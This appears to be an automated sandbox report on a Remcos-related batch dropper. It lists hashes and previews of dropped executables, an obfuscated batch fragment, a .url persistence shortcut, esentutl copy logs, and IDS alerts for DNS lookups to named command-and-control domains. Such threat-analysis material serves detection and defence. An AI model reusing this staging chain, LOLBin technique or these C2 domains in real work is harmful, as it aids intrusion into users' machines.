                                                                                              MD5:35811E8D8969BEF5354C7C3E6DBEFB27
                                                                                              SHA1:E4696F8AF5A54511E89B0153A443C891FFD56511
                                                                                              SHA-256:93674E207F913C1E8FA39A6E75807C6865C73FEEE39E38E7A9747003C8BD22B1
                                                                                              SHA-512:61D0E4BE16D68775C5B73B52E976FB64D10A6A16A5DDF94312C26947268B378FD04F19242A5D9D281E4F30FCEC9DEF9E60C15819B9428C0660ECC99C067910F0
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 24%
                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................V......\.............@..............................................@...........................P...&...............................g..................................................$W...............................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...............................idata...&...P...(..................@....tls....4................................rdata..............................@..@.reloc...g.......h..................@..B.rsrc...............................@..@.....................(..............@..@................................................................................................
                                                                                              Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4
                                                                                              Entropy (8bit):2.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:4vn:4vn
                                                                                              MD5:8E009CFB003A8AFBA9005F58C4D033BA
                                                                                              SHA1:923E7B28DABEA546EC8EC90648174DDD9058219F
                                                                                              SHA-256:814DD6946834238CC05A48FF3F894AB16E2FBB56BBE4FBF386D046537E172226
                                                                                              SHA-512:2B14C4B715B0A816B63F2D825AD968355837F1E3BFAC492399DEC5E4D9F9F11EB6AD88FC3505FB5CAFFBFE2612E2B512FAF3ADAF50173458AB77B0314E1CA525
                                                                                              Malicious:false
                                                                                              Preview:80..
                                                                                              Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):804168
                                                                                              Entropy (8bit):7.399879000521788
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:GI/ZPjxgVWMGLneZf5i0kQb6GyFRAGnNJE2U7yJHxNnrpEGOFz9cWVAfGWYHW8:5lGl7ZfY0tbJyFyGNJE2UoIFBe+Z
                                                                                              MD5:C0F5F6F2ADB80042FB5FE6F88B29D7E9
                                                                                              SHA1:7CB31A5A6D401BBA9AFB211B0C7A580DE6903465
                                                                                              SHA-256:5CF2DF1160CA4357BF87327038C2DD7F01A19DFFAE217C6B4D4E72D4545FCEAA
                                                                                              SHA-512:CC40C42B2B26815D840838CC47611E6CC506B4C2B6B66EB926FDB62E5836A189A370C14997827C8AA94352FC6F0A31E903341C2A3E48EDBD6E78007DF821C8F5
                                                                                              Malicious:true
                                                                                              Preview:...Y#..K!'....#$....%...$....#...#......$%.......'.&%.#......$.&%...".'".!....%...!.%"..".....%....Y#..K."&.....&.....Y#..K................................................................................................................................................................................................................................................................................................................................................................................................................. ......................2"..>...-$..I..........................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1058816
                                                                                              Entropy (8bit):6.943911720958145
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:uYpg9YBvkXS4+lSFSZtY09Rzviu3E3Xxb5upgNcyAq9cfeWybiZFIO37Lftiid:TCYkXV+ldZtDRDiuqx1SeWybiZFIOn
                                                                                              MD5:35811E8D8969BEF5354C7C3E6DBEFB27
                                                                                              SHA1:E4696F8AF5A54511E89B0153A443C891FFD56511
                                                                                              SHA-256:93674E207F913C1E8FA39A6E75807C6865C73FEEE39E38E7A9747003C8BD22B1
                                                                                              SHA-512:61D0E4BE16D68775C5B73B52E976FB64D10A6A16A5DDF94312C26947268B378FD04F19242A5D9D281E4F30FCEC9DEF9E60C15819B9428C0660ECC99C067910F0
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 24%
                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................V......\.............@..............................................@...........................P...&...............................g..................................................$W...............................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...............................idata...&...P...(..................@....tls....4................................rdata..............................@..@.reloc...g.......h..................@..B.rsrc...............................@..@.....................(..............@..@................................................................................................
                                                                                              Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                              File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):62357
                                                                                              Entropy (8bit):4.705712327109906
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                              MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                              SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                              SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                              SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                              Malicious:false
                                                                                              Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
                                                                                              Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Puyiaiob.PIF">), ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):104
                                                                                              Entropy (8bit):5.095537166020087
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMgSLm7ysbxmVyfAv:HRYFVmTWDyzWTExEbv
                                                                                              MD5:E7E7617D0DA40103060BCA0F81563966
                                                                                              SHA1:E5DCD18073AB5CE5D28343151FF6E984B4242191
                                                                                              SHA-256:C2F3FABCB08FAAA5EE494F097B3104637AF11E87366923590EF62FD878CF6E42
                                                                                              SHA-512:E7BF9BA409C6BC7685D79D14E0D604656AD82239F4C63F138AA64304F05E70E004B050F840431F576FBD52B67E40D7898EE71302E2A246953DE115F2CA4B92B4
                                                                                              Malicious:true
                                                                                              Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Puyiaiob.PIF"..IconIndex=908337..HotKey=54..
                                                                                              Process:C:\Windows\System32\extrac32.exe
                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                              Category:modified
                                                                                              Size (bytes):289792
                                                                                              Entropy (8bit):6.135598950357573
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                                              MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                              SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                                              SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                                              SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: A1 igazol#U00e1s.cmd, Detection: malicious, Browse
                                                                                              • Filename: Documentazione_Doganale_richieste_di_copia.cmd, Detection: malicious, Browse
                                                                                              • Filename: 78326473_PDF.cmd, Detection: malicious, Browse
                                                                                              • Filename: iuhmzvlH.cmd, Detection: malicious, Browse
                                                                                              • Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious, Browse
                                                                                              • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                                                                              • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                                              • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd, Detection: malicious, Browse
                                                                                              • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd, Detection: malicious, Browse
                                                                                              • Filename: TZH3Uk8x45.bat, Detection: malicious, Browse
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):236544
                                                                                              Entropy (8bit):6.4416694948877025
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                              MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                              SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                              SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\System32\extrac32.exe
                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                              Category:modified
                                                                                              Size (bytes):1651712
                                                                                              Entropy (8bit):6.144018815244304
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                                                                              MD5:F17616EC0522FC5633151F7CAA278CAA
                                                                                              SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                                                                              SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                                                                              SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):18944
                                                                                              Entropy (8bit):5.742964649637377
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                              MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                              SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                              SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                              SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):589
                                                                                              Entropy (8bit):4.610621343441669
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:qzBBVmXxTzWReSbZ7u0wxDDDDDDDDjCaY58laYAfCMlTB8NGNJ:iBB0XxTzWRp7u0wQak8lapTt8Nc
                                                                                              MD5:6CFE4039B2E75C5E41B68FB72DFAD3E7
                                                                                              SHA1:3520ED082E19B5C9E9F6DFB8AB2965C544E50E0B
                                                                                              SHA-256:B8C992C22A69FE49714BB9178B3AFB324EC5C9FF2F7EFDD84C07DC7D7443AEFC
                                                                                              SHA-512:44B035C5E65CBDB8C809909FA38EA5EB5A9E29532651721DD7F3C24E32E8EC82D9CB2CB1A8B27E68531E74D605C5E95B7407B276272EC00317C93415AA3D7B99
                                                                                              Malicious:false
                                                                                              Preview:..Initiating COPY FILE mode..... Source File: C:\Users\Public\Libraries\AnyDesk.PIF...Destination File: C:\\Users\\Public\\Libraries\\Puyiaiob.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x102800 (1058816) (1 MB)....Total bytes written = 0x103000 (1060864) (1 MB).......Operation completed successfully in 0.94 seconds.....
                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):560
                                                                                              Entropy (8bit):4.532578488470501
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNBG:/p4xT5cp7u0wQakB4aV4t8Nd
                                                                                              MD5:4D6C195EBA3736E57EF6A03F1EEEF490
                                                                                              SHA1:237210C613550627B46D6D6AB82F396EACA3EA20
                                                                                              SHA-256:FF89C20795C881958044CCE205E8EBAE0CC028631ED1E354BEF0AF0C5BD23E3C
                                                                                              SHA-512:2E4AC9CDB61DDEFDDEE6378C39282BABFCC457BB896D1B92E07E234BC202D0677FC20BD96FD0102A32B211DB5D47DDB1C8C0A396A481C9696E7CF0DF4959D3A1
                                                                                              Malicious:false
                                                                                              Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.62 seconds.....
                                                                                              File type:Unicode text, UTF-8 text, with very long lines (468), with CRLF line terminators
                                                                                              Entropy (8bit):4.965948591559571
                                                                                              TrID:
                                                                                                File name:saw.bat
                                                                                                File size:2'921'546 bytes
                                                                                                MD5:0be98dc322d842f3f9952ca41c2fe012
                                                                                                SHA1:a0d32141b0c3bb39ce4f4e6a8d4fb0699341d4e3
                                                                                                SHA256:a1a77d48d276da51e97ce070b0d4c08c6f2900e8a2d4c15ce0adb4cff27c2669
                                                                                                SHA512:87b4c7bea4e405b9c7f272c4873f648c8ce7ca43543f66e2996b333a2695b90c689d5e31329198a3be8aeea519f39db99408274821bb7066fedb94606ad83b8f
                                                                                                SSDEEP:24576:FYfNclHFdqSgaRDQMErAfBEHuMEIZVx+RCNJXCP+G1dT+pnmSqocVHrO5I8CZ:FqNclHbqS710rAf+uME6AP7xCA
                                                                                                TLSH:1CD55FF738AF17475705639BA78BE96427ABC83747C27EC4C0CAD688400A6DF1960E5E
                                                                                                File Content Preview:PIFPIF@%..%e%.. .. .. ..%c%..%h%........ ........ %o% ..........% %......%o%.......... %f% %f%....%..s%..................... r%e%...%t%.................. ...% %............%"%............%H%... %R%....... ...%T%.......%w%.........o......%=% ......... ....
                                                                                                Icon Hash:9686878b929a9886
                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2024-11-30T21:20:00.748532+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731172.217.19.238443TCP
                                                                                                2024-11-30T21:20:03.715665+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732142.250.181.33443TCP
                                                                                                2024-11-30T21:20:14.165777+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4581941.1.1.153UDP
                                                                                                2024-11-30T21:20:14.399771+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4593431.1.1.153UDP
                                                                                                2024-11-30T21:20:14.729773+01002052853ET MALWARE DNS Query to Remcos Related Domain (myumysmeetr .ddns .net)1192.168.2.4580981.1.1.153UDP
                                                                                                2024-11-30T21:20:14.960142+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4620931.1.1.153UDP
                                                                                                2024-11-30T21:20:19.664894+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4510831.1.1.153UDP
                                                                                                2024-11-30T21:20:19.811277+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4535471.1.1.153UDP
                                                                                                2024-11-30T21:20:19.953778+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4611551.1.1.153UDP
                                                                                                2024-11-30T21:20:24.496412+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4612571.1.1.153UDP
                                                                                                2024-11-30T21:20:24.638699+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4651261.1.1.153UDP
                                                                                                2024-11-30T21:20:25.968305+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4510461.1.1.153UDP
                                                                                                2024-11-30T21:20:29.206114+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4573101.1.1.153UDP
                                                                                                2024-11-30T21:20:29.344915+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4506671.1.1.153UDP
                                                                                                2024-11-30T21:20:31.508606+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4583771.1.1.153UDP
                                                                                                2024-11-30T21:20:35.031611+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4502361.1.1.153UDP
                                                                                                2024-11-30T21:20:35.170342+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4564371.1.1.153UDP
                                                                                                2024-11-30T21:20:36.414866+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4522311.1.1.153UDP
                                                                                                2024-11-30T21:20:40.879401+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4498441.1.1.153UDP
                                                                                                2024-11-30T21:20:41.037495+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4609741.1.1.153UDP
                                                                                                2024-11-30T21:20:41.207197+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4546161.1.1.153UDP
                                                                                                2024-11-30T21:20:46.690949+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4574901.1.1.153UDP
                                                                                                2024-11-30T21:20:46.866140+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4604711.1.1.153UDP
                                                                                                2024-11-30T21:20:47.011625+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4528101.1.1.153UDP
                                                                                                2024-11-30T21:20:51.472702+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4580671.1.1.153UDP
                                                                                                2024-11-30T21:20:51.612708+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4526341.1.1.153UDP
                                                                                                2024-11-30T21:20:52.775781+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4539101.1.1.153UDP
                                                                                                2024-11-30T21:20:56.191186+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4499501.1.1.153UDP
                                                                                                2024-11-30T21:20:56.331584+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4655351.1.1.153UDP
                                                                                                2024-11-30T21:20:57.410476+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4645621.1.1.153UDP
                                                                                                2024-11-30T21:21:01.336260+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4510701.1.1.153UDP
                                                                                                2024-11-30T21:21:01.481594+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4640851.1.1.153UDP
                                                                                                2024-11-30T21:21:02.425920+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4521501.1.1.153UDP
                                                                                                2024-11-30T21:21:06.472411+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4600831.1.1.153UDP
                                                                                                2024-11-30T21:21:06.610152+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4516861.1.1.153UDP
                                                                                                2024-11-30T21:21:07.395180+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4495331.1.1.153UDP
                                                                                                2024-11-30T21:21:11.300691+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4556171.1.1.153UDP
                                                                                                2024-11-30T21:21:11.440707+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4632561.1.1.153UDP
                                                                                                2024-11-30T21:21:12.097825+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4536131.1.1.153UDP
                                                                                                2024-11-30T21:21:16.081947+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4648351.1.1.153UDP
                                                                                                2024-11-30T21:21:16.223571+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4559831.1.1.153UDP
                                                                                                2024-11-30T21:21:17.114683+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4515161.1.1.153UDP
                                                                                                2024-11-30T21:21:20.911866+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4511151.1.1.153UDP
                                                                                                2024-11-30T21:21:21.060028+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4606811.1.1.153UDP
                                                                                                2024-11-30T21:21:21.925966+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4527891.1.1.153UDP
                                                                                                2024-11-30T21:21:26.003395+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4561461.1.1.153UDP
                                                                                                2024-11-30T21:21:26.142193+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4537641.1.1.153UDP
                                                                                                2024-11-30T21:21:26.914161+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4515961.1.1.153UDP
                                                                                                2024-11-30T21:21:30.894482+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4507901.1.1.153UDP
                                                                                                2024-11-30T21:21:31.042434+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4631741.1.1.153UDP
                                                                                                2024-11-30T21:21:31.894876+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4532241.1.1.153UDP
                                                                                                2024-11-30T21:21:35.895926+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4575281.1.1.153UDP
                                                                                                2024-11-30T21:21:36.037108+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4650981.1.1.153UDP
                                                                                                2024-11-30T21:21:36.899306+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4512541.1.1.153UDP
                                                                                                2024-11-30T21:21:40.893780+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4560281.1.1.153UDP
                                                                                                2024-11-30T21:21:41.032602+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4641701.1.1.153UDP
                                                                                                2024-11-30T21:21:41.897578+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4567691.1.1.153UDP
                                                                                                2024-11-30T21:21:45.894664+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4630601.1.1.153UDP
                                                                                                2024-11-30T21:21:46.033448+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4586291.1.1.153UDP
                                                                                                2024-11-30T21:21:46.893853+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4586911.1.1.153UDP
                                                                                                2024-11-30T21:21:50.893873+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4514711.1.1.153UDP
                                                                                                2024-11-30T21:21:51.032885+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4522451.1.1.153UDP
                                                                                                2024-11-30T21:21:51.893728+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4580651.1.1.153UDP
                                                                                                2024-11-30T21:21:55.976395+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4645741.1.1.153UDP
                                                                                                2024-11-30T21:21:56.174391+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4629331.1.1.153UDP
                                                                                                2024-11-30T21:21:56.894636+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4590561.1.1.153UDP
                                                                                                2024-11-30T21:22:00.894512+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4633801.1.1.153UDP
                                                                                                2024-11-30T21:22:01.033886+01002052851ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)1192.168.2.4516981.1.1.153UDP
                                                                                                2024-11-30T21:22:01.894428+01002052849ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)1192.168.2.4635861.1.1.153UDP
                                                                                                2024-11-30T21:22:05.893787+01002052852ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)1192.168.2.4566311.1.1.153UDP
